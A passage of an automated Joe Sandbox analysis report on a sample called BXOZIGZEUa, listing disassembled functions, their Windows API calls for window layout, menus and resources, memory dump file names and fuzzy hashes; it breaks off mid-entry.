Part of subcall function 0053F436: FindResourceW.KERNEL32(?,?,00000005,00000024,0054EE2A,?,?,?), ref: 0053F473
Part of subcall function 0053F436: LoadResource.KERNEL32(?,00000000,?,?), ref: 0053F47B
Part of subcall function 0053F436: LockResource.KERNEL32(?,00000024,0054EE2A,?,?,?), ref: 0053F48C

Part of subcall function 0054EB85: __EH_prolog3.LIBCMT ref: 0054EB8C
Part of subcall function 0054EB85: ~_Task_impl.LIBCPMT ref: 0054EBD0
Part of subcall function 0054EB85: ~_Task_impl.LIBCPMT ref: 0054EBDF
Part of subcall function 0054EB85: ~_Task_impl.LIBCPMT ref: 0054EBEE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3ObjectResourceTask_impl$CompatibleCreate$BitmapException@8FillFindH_prolog3_catchLoadLockRectSelectThrow
String ID:
API String ID: 4119110093-0
Opcode ID: 64c16a8ebcc3fdc8cee97a987159aef35587a93e0bbc123b64f835d08fe88a32
Instruction ID: 37ffcb65cc26d0d6845cc289621e81cb5410c4886e1d5e48c68b0f765cc01a5d
Opcode Fuzzy Hash: 64c16a8ebcc3fdc8cee97a987159aef35587a93e0bbc123b64f835d08fe88a32
Instruction Fuzzy Hash: 0F519E75900298AFDB11EB65CC55BEEBBB9FF49304F1041DAE806A3281DBB45E84CF61

Function 004EC592 Relevance: 6.1, APIs: 4, Instructions: 132windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004EC599
SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 004EC6E5

Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88

SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 004EC671

Part of subcall function 00515BA3: __EH_prolog3.LIBCMT ref: 00515BAA

SendDlgItemMessageW.USER32(?,?,0000037C,?,?), ref: 004EC6A3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ItemMessageSend$H_prolog3$_malloc
String ID:
API String ID: 2480034192-0
Opcode ID: 69ff95e3f6c6293ce85549f6901b673ee1edc2c48408e29f2e42e919aca3fb9c
Instruction ID: 51fe52336b49f098398f53b2b3024386c8afa911bdb5a8f6cb33ea1d3ef641d6
Opcode Fuzzy Hash: 69ff95e3f6c6293ce85549f6901b673ee1edc2c48408e29f2e42e919aca3fb9c
Instruction Fuzzy Hash: 3141D371900185ABDF209F66CC84ABF3AB5FF90325F50421BF961AA2D0DB384E43D758

Function 005CD627 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005CD6C2
__flush.LIBCMT ref: 005CD6E0
__write.LIBCMT ref: 005CD707
__flsbuf.LIBCMT ref: 005CD732

Part of subcall function 005CE629: __getptd_noexit.LIBCMT ref: 005CE629

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 9fb5eafde9ac0169d79dbd6bd5820b39befd159722b1eca9078c5386278874eb
Instruction ID: be5b7f6d8d85c6cc2ebd0c94ce88688a8c97211d55b206c920c443f1ce08f905
Opcode Fuzzy Hash: 9fb5eafde9ac0169d79dbd6bd5820b39befd159722b1eca9078c5386278874eb
Instruction Fuzzy Hash: A1416D71A006059FDB249FE98984FAEBFB5FF80360B24853DE419D7650E770AE81DB60

Function 005247B7 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005247BE

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Part of subcall function 004DBB21: __EH_prolog3_catch.LIBCMT ref: 004DBB28

GetWindowRect.USER32(?,?), ref: 005248B2
GetSystemMetrics.USER32(00000010), ref: 005248C0
GetSystemMetrics.USER32(00000011), ref: 005248CB

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$Exception@8H_prolog3H_prolog3_H_prolog3_catchRectThrowWindow
String ID:
API String ID: 3575448974-0
Opcode ID: 5771e3ccf3d4d8fc3a8e8da939f1fd39fdac87603f635eb7a9ab72dfd0b44485
Instruction ID: 10d8a41e464e4708744a9713a462192d021e6b370f994d0258d3eef9d2738ab2
Opcode Fuzzy Hash: 5771e3ccf3d4d8fc3a8e8da939f1fd39fdac87603f635eb7a9ab72dfd0b44485
Instruction Fuzzy Hash: 67415A71A006159FCB14EFA5C895AEEBBF5FF48300F14446EF906AB291CB74A944CF50

Function 005528C2 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 005529A4
EqualRect.USER32(?,?), ref: 005529CA
BeginDeferWindowPos.USER32(?), ref: 005529D7
EndDeferWindowPos.USER32(?), ref: 005529FD

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$DeferRect$BeginEqualException@8H_prolog3Throw
String ID:
API String ID: 2548128233-0
Opcode ID: 53a885cf31758a800b08478791cc563c6492738a1466ed4c6f4073d66161e9d0
Instruction ID: 38d0d7bfda17595bea45f6f5b20e9188ce6c9f1d2b237ea57db67ef6014e1aa7
Opcode Fuzzy Hash: 53a885cf31758a800b08478791cc563c6492738a1466ed4c6f4073d66161e9d0
Instruction Fuzzy Hash: 29416D71A002099FCF11DFA5C8948EEBFF9FF99311F14456AE902AB211DB71A944CF50

Function 0051C592 Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0051C652
SetRectEmpty.USER32(?), ref: 0051C65F
SetRectEmpty.USER32(?), ref: 0051C70D
SetRectEmpty.USER32 ref: 0051C76A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 322ddb81817e403fda8e5b9d754efb508404bb8429a0519bec94db053e106759
Instruction ID: ba1e05819be8c5dd071d5a1362bde0588dfa94de0ee47c3d56d3d0ce82a8e5d6
Opcode Fuzzy Hash: 322ddb81817e403fda8e5b9d754efb508404bb8429a0519bec94db053e106759
Instruction Fuzzy Hash: 9C519DB1805B858ED360DF3AC5806E6FAE9BFA5314F104E2FD0AED2261D7B065819F54

Function 005522AE Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 005522E4
GetWindowRect.USER32(?,?), ref: 0055236A
EqualRect.USER32(?,?), ref: 00552378
GetParent.USER32(?), ref: 00552389

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$EqualParent
String ID:
API String ID: 2870910800-0
Opcode ID: da88d61e6379f0dba2d09fed87515a927dda32423bedd3aba34e8e76f42d5fc9
Instruction ID: 278257fc3f1e765b81d01e732981694c7a43f42299edb7a9077c0d07d022d369
Opcode Fuzzy Hash: da88d61e6379f0dba2d09fed87515a927dda32423bedd3aba34e8e76f42d5fc9
Instruction Fuzzy Hash: E9416D75A01209DFCF10DFA5C894ABEBBB9FF49701F15056AE905EB210DB34AD44DBA0

Function 004F2596 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 004F2662
ClientToScreen.USER32(?,?), ref: 004F2672
IsWindow.USER32(?), ref: 004F2694
ClientToScreen.USER32(?,?), ref: 004F26C9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientScreenWindow
String ID:
API String ID: 1643562046-0
Opcode ID: c7efd940d8222c2077335162f90ebac9e2d43f77995607443722908dc778a7ed
Instruction ID: 200b3221fde75f35f57cbb4a5339bb304a431c00c18410956a4e6ace77bf152a
Opcode Fuzzy Hash: c7efd940d8222c2077335162f90ebac9e2d43f77995607443722908dc778a7ed
Instruction Fuzzy Hash: BB41E471500209BAEF259F54CD84EBF7BA5FF08340F10446BEA45D6261EBB9DD40DB14

Function 005E083C Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005E0870
__isleadbyte_l.LIBCMT ref: 005E08A3
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 005E08D4
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 005E0942

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: c2185d15af73a2c10e60b87f0af3eb59359719d0511cbf4a575bc21fb2c23e48
Instruction ID: ea2353ad6675b572695ea798c633d1055d9e8e612d4606017da742bbcb7872a9
Opcode Fuzzy Hash: c2185d15af73a2c10e60b87f0af3eb59359719d0511cbf4a575bc21fb2c23e48
Instruction Fuzzy Hash: 0D31A031A04286EFDB18DF66D8849BE3FA5FF01310F15A569E4918B1D2D3B0D980DB90

Function 00536799 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0053684F
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000014), ref: 00536885
InvalidateRect.USER32(?,00000000,00000001), ref: 0053688F
UpdateWindow.USER32(?), ref: 00536896

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$InvalidateRectUpdate
String ID:
API String ID: 1651931182-0
Opcode ID: 43794ce68b328dae4f43450b899058d442fba71e0a5a9f21258be5f4388aee8e
Instruction ID: 1259d3fc88f22bf8c6173a66edce854040223fc357d16257a9618a2996567d32
Opcode Fuzzy Hash: 43794ce68b328dae4f43450b899058d442fba71e0a5a9f21258be5f4388aee8e
Instruction Fuzzy Hash: A7315A31940B04FFCF32CF65C8889AABFF4FB98755F24892EE5A692111E7709980DB51

Function 005187A3 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005187AD
GetDlgCtrlID.USER32(?), ref: 00518816

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000050,00000000,00000000,00000000,0000020C,0051B1BA,?,?,?), ref: 00518877
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 005188AC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ByteCharCtrlException@8H_prolog3H_prolog3_MultiThrowWideWindow
String ID:
API String ID: 1933732581-0
Opcode ID: e139e5cc7d54ac1b17d3a0c8e4eb0e3adc032bd3e8fd9ac8181cf90154626e8f
Instruction ID: fa3407e5851ba47715742854b1063459c8f0e8b4a408ebe65f6440fb9378b0bb
Opcode Fuzzy Hash: e139e5cc7d54ac1b17d3a0c8e4eb0e3adc032bd3e8fd9ac8181cf90154626e8f
Instruction Fuzzy Hash: B931E431540205ABDB30AB748C59FFE7B69BF60714F140A5EF526A62D1DE309DC0CA21

Function 0052B4C0 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0052B4E9
GetWindowRect.USER32(?,?), ref: 0052B520
GetClientRect.USER32(?,?), ref: 0052B53E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientEmptyWindow
String ID:
API String ID: 742297903-0
Opcode ID: c701a0355a52873f49344f33b826a15ab61c6e7b1ba9f40d8d1ac38def82912e
Instruction ID: 6e7c0eefc6b2b1757df68d5c13fbfadb0d8b683d2863facee90b22f8dd5e8722
Opcode Fuzzy Hash: c701a0355a52873f49344f33b826a15ab61c6e7b1ba9f40d8d1ac38def82912e
Instruction Fuzzy Hash: 51311AB1A00219EFDB04DF69D984A79BBF5FF4A304B108569E41ADB291EB34ED40CB90

Function 00585637 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0058568D
IsRectEmpty.USER32(?), ref: 00585697
SetRectEmpty.USER32(?), ref: 005856EE
SetRectEmpty.USER32(?), ref: 005856F4

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 389b45573f61d356f763cc80cdf4749ea212f25e1ee5fd3b1e56928ab0de723e
Instruction ID: 36e7618f1634bccad4aa362f79bdcef232464054d46a7ccd28030102f0061f53
Opcode Fuzzy Hash: 389b45573f61d356f763cc80cdf4749ea212f25e1ee5fd3b1e56928ab0de723e
Instruction Fuzzy Hash: CC316D71900618DBCF11EFA5C8C09AEBBB8FF88710B60456AED05FB106EB759985CF91

Function 005A64BC Relevance: 6.1, APIs: 4, Instructions: 91windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005A64C3
GetMenuItemCount.USER32(?), ref: 005A6515
GetMenuItemID.USER32(?,00000000), ref: 005A6576
GetSubMenu.USER32(?,00000000), ref: 005A6585

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$CountH_prolog3
String ID:
API String ID: 366217265-0
Opcode ID: 9463321c11a19b4f984f41c3fdad819da57f9462fdf2c98e2319c8fd22ff6f1e
Instruction ID: 65c099a9b766458e0f5776c1ca10277138c42cc92797a275fd40455a233afd69
Opcode Fuzzy Hash: 9463321c11a19b4f984f41c3fdad819da57f9462fdf2c98e2319c8fd22ff6f1e
Instruction Fuzzy Hash: AB31FCB0600903AFCF28EF64C8E9A7E7FA4FF5A305B18462EE112CA191CB30E841C650

Function 00534FA2 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000015), ref: 00534FFE
SetRectEmpty.USER32(?), ref: 00535055
SetRectEmpty.USER32(?), ref: 0053505E
SetRectEmpty.USER32(?), ref: 0053506D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$MetricsSystem
String ID:
API String ID: 4159773870-0
Opcode ID: 3de4a6e4b161ddf925f5df2540c2876ea90890af9f39e167389d773311a6439f
Instruction ID: 962bebe9b18252e625bdf6e4cdc1b56e91af0fe5af57dd8cb9c63f865de8d8c4
Opcode Fuzzy Hash: 3de4a6e4b161ddf925f5df2540c2876ea90890af9f39e167389d773311a6439f
Instruction Fuzzy Hash: 4D31387190061ADFCF04DFA4C88CAEA7BB4FF49304F0805B9ED09AF145DA75A945CBA0

Function 0054CF23 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0054CF52
GetParent.USER32(?), ref: 0054CF5B

Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139

OffsetRect.USER32(?,00000000,?), ref: 0054CF9C
OffsetRect.USER32(?,?,00000000), ref: 0054CFAE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

